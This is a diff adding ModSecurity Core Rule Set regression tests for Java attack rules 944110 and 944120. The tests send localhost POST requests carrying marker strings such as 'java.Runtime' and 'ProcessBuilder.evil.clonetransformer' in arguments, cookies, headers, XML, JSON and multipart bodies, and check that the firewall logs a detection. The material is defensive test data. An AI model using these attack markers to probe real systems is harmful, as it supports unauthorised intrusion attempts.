+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "test=java.ProcessBuilder"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-3
+ desc: Argument name includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "java.Runtime=test"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-4
+ desc: Argument name includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "java.ProcessBuilder=test"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-5
+ desc: Cookie test includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: test=java.Runtime
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-6
+ desc: Cookie test includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: test=java.ProcessBuilder
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-7
+ desc: Cookie name includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: java.Runtime=test
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-8
+ desc: Cookie name includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: java.ProcessBuilder=test
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-9
+ desc: Request header test includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ test: java.Runtime
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-10
+ desc: Request header test includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ test: java.ProcessBuilder
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-11
+ desc: XML element includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "value"
+ output:
+ no_log_contains: "id \"944110\""
+ - test_title: 944110-12
+ desc: XML attribute name includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944110\""
+ - test_title: 944110-13
+ desc: XML attribute value includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-14
+ desc: XML element value includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "java.Runtime"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-15
+ desc: XML element includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "value"
+ output:
+ no_log_contains: "id \"944110\""
+ - test_title: 944110-16
+ desc: XML attribute name includes keyworda java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944110\""
+ - test_title: 944110-17
+ desc: XML attribute value includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-18
+ desc: XML element value includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "java.ProcessBuilder"
+ output:
+ log_contains: "id \"944110\""
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
new file mode 100644
index 000000000..509fe1e9e
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
@@ -0,0 +1,2943 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944120.yaml" + description: "Positive tests for rule 944120" +tests: + - test_title: 944120-0 + desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-1 + desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-2 + desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
test=ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-3 + desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-4 + desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-5 + desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-6 + desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-7 + desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-8 + desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - 
test_title: 944120-9 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-10 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-11 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-12 + 
desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-13 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-14 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 
+ Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-15 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-16 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + 
version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-17 + desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-18 + desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-19 + desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-20 + desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-21 + desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-22 + desc: "XML element includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-23 + desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-24 + desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-25 + desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" 
